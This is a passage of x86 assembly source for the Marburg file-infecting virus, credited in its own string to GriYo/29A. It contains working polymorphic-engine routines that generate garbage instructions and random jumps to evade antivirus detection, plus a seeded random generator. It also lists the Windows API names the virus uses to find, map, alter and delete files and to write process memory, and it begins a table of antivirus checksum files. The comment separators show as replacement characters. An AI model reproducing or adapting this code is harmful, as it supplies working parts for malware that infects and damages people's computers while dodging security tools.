;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_push_g_pop: ;Note that garbage generator can call itself in a
|
||
;recursive way, so structures like the following
|
||
;example can be produced
|
||
;
|
||
; push reg_1
|
||
; ...
|
||
; push reg_2
|
||
; ...
|
||
; pop reg_2
|
||
; ...
|
||
; pop reg_1
|
||
;
|
||
|
||
call get_rnd_reg
|
||
mov al,50h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
call gen_garbage
|
||
call get_valid_reg
|
||
mov al,58h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate unconditional jumps
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_jump_u: mov al,0E9h
|
||
stosb
|
||
push edi
|
||
stosd
|
||
call gen_rnd_block
|
||
pop edx
|
||
mov eax,edi
|
||
sub eax,edx
|
||
sub eax,00000004h
|
||
mov dword ptr [edx],eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate conditional jumps
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_jump_c: call get_rnd32
|
||
and ah,0Fh
|
||
add ah,80h
|
||
mov al,0Fh
|
||
stosw
|
||
push edi
|
||
stosd
|
||
call gen_garbage
|
||
pop edx
|
||
mov eax,edi
|
||
sub eax,edx
|
||
sub eax,00000004h
|
||
mov dword ptr [edx],eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate one byte garbage code that does not change reg values
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_save_code: mov eax,end_save_code-tbl_save_code
|
||
call get_rnd_range
|
||
mov al,byte ptr [ebp+tbl_save_code+eax]
|
||
stosb
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Initialize register table
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
init_poly: ;We can call this routine from lots of places, so
|
||
;take care about direction flag
|
||
|
||
cld
|
||
|
||
;Initialize random number generator
|
||
;Use current day + hour as seed
|
||
|
||
mov eax,dword ptr [ebp+time_day]
|
||
mov dword ptr [ebp+rnd32_seed],eax
|
||
|
||
;Initialize register table
|
||
|
||
lea esi,dword ptr [ebp+tbl_startup]
|
||
lea edi,dword ptr [ebp+tbl_regs+REG_FLAGS]
|
||
mov ecx,00000007h
|
||
loop_init_regs: movsb
|
||
inc edi
|
||
loop loop_init_regs
|
||
|
||
;Clear recursive level counter
|
||
|
||
mov dword ptr [ebp+recursive_level],ecx
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get a ramdom reg
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_rnd_reg: mov eax,00000007h
|
||
call get_rnd_range
|
||
lea ebx,dword ptr [ebp+tbl_regs+eax*02h]
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get a ramdom reg (avoid REG_READ_ONLY, REG_IS_COUNTER and REG_IS_INDEX)
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_valid_reg: call get_rnd_reg
|
||
mov al,byte ptr [ebx+REG_FLAGS]
|
||
and al,REG_IS_INDEX or REG_IS_COUNTER or REG_READ_ONLY
|
||
jnz get_valid_reg
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Load ecx with crypt_size / oper_size
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
fixed_size2ecx: mov eax,inf_size-DECRYPTOR_SIZE
|
||
xor ecx,ecx
|
||
mov cl,byte ptr [ebp+oper_size]
|
||
shr ecx,01h
|
||
or ecx,ecx
|
||
jz ok_2ecx
|
||
shr eax,cl
|
||
jnc ok_2ecx
|
||
inc eax
|
||
ok_2ecx: mov ecx,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate a block of random data
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_rnd_block: ;Generate up to 27 random bytes
|
||
|
||
mov eax,00000004h
|
||
mov ecx,eax
|
||
call get_rnd_range
|
||
add ecx,eax
|
||
cld
|
||
|
||
rnd_fill_loop: ;Fill loop, get random dword
|
||
|
||
call get_rnd32
|
||
stosd
|
||
loop rnd_fill_loop
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Linear congruent pseudorandom number generator
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_rnd32: push ecx
|
||
push edx
|
||
mov eax,dword ptr [ebp+rnd32_seed]
|
||
mov ecx,eax
|
||
imul eax,41C64E6Dh
|
||
add eax,00003039h
|
||
mov dword ptr [ebp+rnd32_seed],eax
|
||
xor eax,ecx
|
||
pop edx
|
||
pop ecx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Returns a random num between 0 and entry eax
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_rnd_range: push ecx
|
||
push edx
|
||
mov ecx,eax
|
||
call get_rnd32
|
||
xor edx,edx
|
||
div ecx
|
||
mov eax,edx
|
||
pop edx
|
||
pop ecx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
;Virus initialized data
|
||
|
||
;Copyright notice
|
||
|
||
db "[ Marburg ViRuS BioCoded by GriYo/29A ]"
|
||
|
||
;Array of RVAs to function names
|
||
|
||
viral_functions equ this byte
|
||
|
||
dd offset szCreateFileA
|
||
dd offset szCreateFileMap
|
||
dd offset szMapViewOfFile
|
||
dd offset szUnmapView
|
||
dd offset szCloseHandle
|
||
dd offset szFindFirst
|
||
dd offset szFindNext
|
||
dd offset szFindClose
|
||
dd offset szVirtualAlloc
|
||
dd offset szGetWinDir
|
||
dd offset szGetSysDir
|
||
dd offset szGetCurDir
|
||
dd offset szSetFileAttr
|
||
dd offset szSetFileTime
|
||
dd offset szDeleteFile
|
||
dd offset szGetCurProc
|
||
dd offset szWriteProcMem
|
||
dd offset szLoadLibrary
|
||
dd offset szGetSysTime
|
||
|
||
viral_tbl_end equ this byte
|
||
|
||
;Names of modules used by the virus
|
||
|
||
szKernel32 db "KERNEL32.dll",00h
|
||
szUSER32 db "USER32.dll",00h
|
||
|
||
;Kernel32 APIs used by the virus
|
||
|
||
szGetModuleH db "GetModuleHandleA",00h
|
||
szGetProcAddr db "GetProcAddress",00h
|
||
szCreateFileA db "CreateFileA",00h
|
||
szCreateFileMap db "CreateFileMappingA",00h
|
||
szMapViewOfFile db "MapViewOfFile",00h
|
||
szUnmapView db "UnmapViewOfFile",00h
|
||
szCloseHandle db "CloseHandle",00h
|
||
szFindFirst db "FindFirstFileA",00h
|
||
szFindNext db "FindNextFileA",00h
|
||
szFindClose db "FindClose",00h
|
||
szVirtualAlloc db "VirtualAlloc",00h
|
||
szGetWinDir db "GetWindowsDirectoryA",00h
|
||
szGetSysDir db "GetSystemDirectoryA",00h
|
||
szGetCurDir db "GetCurrentDirectoryA",00h
|
||
szSetFileAttr db "SetFileAttributesA",00h
|
||
szSetFileTime db "SetFileTime",00h
|
||
szDeleteFile db "DeleteFileA",00h
|
||
szGetCurProc db "GetCurrentProcess",00h
|
||
szWriteProcMem db "WriteProcessMemory",00h
|
||
szLoadLibrary db "LoadLibraryA",00h
|
||
szGetSysTime db "GetSystemTime",00h
|
||
|
||
;User32 APIs used by the virus
|
||
|
||
szGetDC db "GetDC",00h
|
||
szLoadIcon db "LoadIconA",00h
|
||
szDrawIcon db "DrawIcon",00h
|
||
|
||
;Names of AV checksum files
|
||
|
||
tbl_AV_files equ this byte
|
||
|
||
dd offset szAvData_00
|
||
dd offset szAvData_01
|
||
dd offset szAvData_02
|
||
